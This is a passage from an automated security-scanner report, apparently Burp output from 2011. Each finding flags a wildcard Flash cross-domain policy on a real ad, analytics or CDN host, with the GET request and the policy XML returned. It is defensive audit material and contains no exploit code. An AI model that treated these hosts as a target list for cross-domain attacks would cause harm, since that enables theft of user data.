Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:12e5"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:35:08 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.7. http://amch.questionmarket.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:02 GMT
Server: Apache/2.2.3
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "e0686c83-d1-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 209
Keep-Alive: timeout=5, max=977
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

3.8. http://analytics.newsinc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.newsinc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: analytics.newsinc.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Mon, 09 May 2011 15:37:50 GMT
ETag: "b485279b64cb1:0"
Last-Modified: Tue, 05 Oct 2010 14:38:51 GMT
NDN-Server: Ana03
NDN-SiteVer: 3.0
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 286
Connection: Close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-ht
...[SNIP]...

3.9. http://ar.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:22 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.10. http://assets1.grouponcdn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets1.grouponcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: assets1.grouponcdn.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.65
Content-Type: text/xml
Accept-Ranges: bytes
Age: 253988
Date: Mon, 09 May 2011 15:35:37 GMT
Last-Modified: Thu, 18 Nov 2010 03:41:54 GMT
Content-Length: 352
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" to-ports="80,443" secure="false" />
...[SNIP]...

3.11. http://at.amgdgt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "308cb3d-12e-4871688bd9a00"
Accept-Ranges: bytes
Content-Length: 302
Cache-Control: max-age=21600
Expires: Mon, 09 May 2011 21:35:46 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

3.12. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 10 May 2011 15:34:58 GMT
Date: Mon, 09 May 2011 15:34:58 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

3.13. http://b.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 10 May 2011 15:35:23 GMT
Date: Mon, 09 May 2011 15:35:23 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

3.14. http://b3.mookie1.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b3.mookie1.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 17 Jun 2010 13:44:25 GMT
ETag: "1ff0231-d0-4893a095c6040"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

3.15. http://bh.contextweb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"384-1279190951000"
Last-Modified: Thu, 15 Jul 2010 10:49:11 GMT
Content-Type: application/xml
Content-Length: 384
Date: Mon, 09 May 2011 15:39:18 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.16. http://bs.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 15:38:51 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


3.17. http://cache-01.cleanprint.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache-01.cleanprint.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache-01.cleanprint.net

Response

HTTP/1.0 200 OK
Server: None
ETag: "cb-43afa3566b0c0"
Accept-Ranges: bytes
X-Server: FD-02
Vary: Accept-Encoding
Content-Type: application/xml
Content-Language: en
Age: 480
Date: Mon, 09 May 2011 15:37:23 GMT
Last-Modified: Tue, 25 Sep 2007 18:50:19 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

3.18. http://cdn.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Length: 355
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 14:23:28 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
x-server: web101
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Mon, 09 May 2011 15:36:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

3.19. http://cdn.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.interclick.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:26 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n7 ( iad-agg-n12), rf-ht iad-agg-n12 ( origin>CONN)
ETag: "7b643f1dafecb1:0"
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Cache-Control: max-age=604800
Expires: Mon, 16 May 2011 15:36:27 GMT
Age: 0
Content-Length: 225
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.20. http://cdn.taboolasyndication.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.taboolasyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.taboolasyndication.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:30 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 06 Jan 2011 14:11:13 GMT
ETag: "578002-199-4992e12fda240"
Accept-Ranges: bytes
Content-Length: 409
Content-Type: text/xml
Cache-Control: private, max-age=31536000
Age: 9996468
Expires: Fri, 13 Jan 2012 22:50:42 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

3.21. http://cr0.worthathousandwords.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cr0.worthathousandwords.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cr0.worthathousandwords.com

Response

HTTP/1.0 200 OK
Content-Length: 305
Content-Type: text/xml
Last-Modified: Thu, 13 Nov 2008 21:02:53 GMT
Accept-Ranges: bytes
ETag: "4a57df31d345c91:303"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=3600
Date: Mon, 09 May 2011 15:38:55 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*"/>
...[SNIP]...

3.22. http://d7.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
X-Varnish: 1842867593 1842831716
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=475
Date: Mon, 09 May 2011 15:36:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.23. http://ds.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Mon, 09 May 2011 15:39:06 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


3.24. http://event.adxpose.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.adxpose.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"203-1304614332000"
Last-Modified: Thu, 05 May 2011 16:52:12 GMT
Content-Type: application/xml
Content-Length: 203
Date: Mon, 09 May 2011 15:35:21 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-poli
...[SNIP]...

3.25. http://finance.fox8live.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://finance.fox8live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: finance.fox8live.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:57 GMT
Server: nginx/0.8.15
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 09 May 2011 15:36:57 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.26. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 09 May 2011 01:12:03 GMT
Expires: Thu, 05 May 2011 01:09:19 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 51816
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.27. http://fw.adsafeprotected.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fw.adsafeprotected.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1304446860000"
Last-Modified: Tue, 03 May 2011 18:21:00 GMT
Content-Type: application/xml
Content-Length: 202
Date: Mon, 09 May 2011 15:39:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

3.28. http://gannett.gcion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

3.29. http://gscounters.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2ae5"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web205
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:56 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

3.30. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:35:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.31. http://ic.nexac.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ic.nexac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ic.nexac.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:38:39 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.32. http://idcs.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 08 Mar 2011 22:34:09 GMT
Accept-Ranges: bytes
ETag: "f2db35f1e0ddcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:37:52 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.33. http://k.collective-media.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: k.collective-media.net

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/plain
Content-Length: 187
Last-Modified: Tue, 31 Aug 2010 17:41:28 GMT
Accept-Ranges: bytes
Date: Mon, 09 May 2011 15:37:00 GMT
Connection: close
Set-Cookie: JY57=CT; expires=Mon, 06-Jun-2011 15:37:00 GMT; path=/; domain=.collective-media.net
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>

3.34. http://log30.doubleverify.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:38:10 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.35. http://map.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

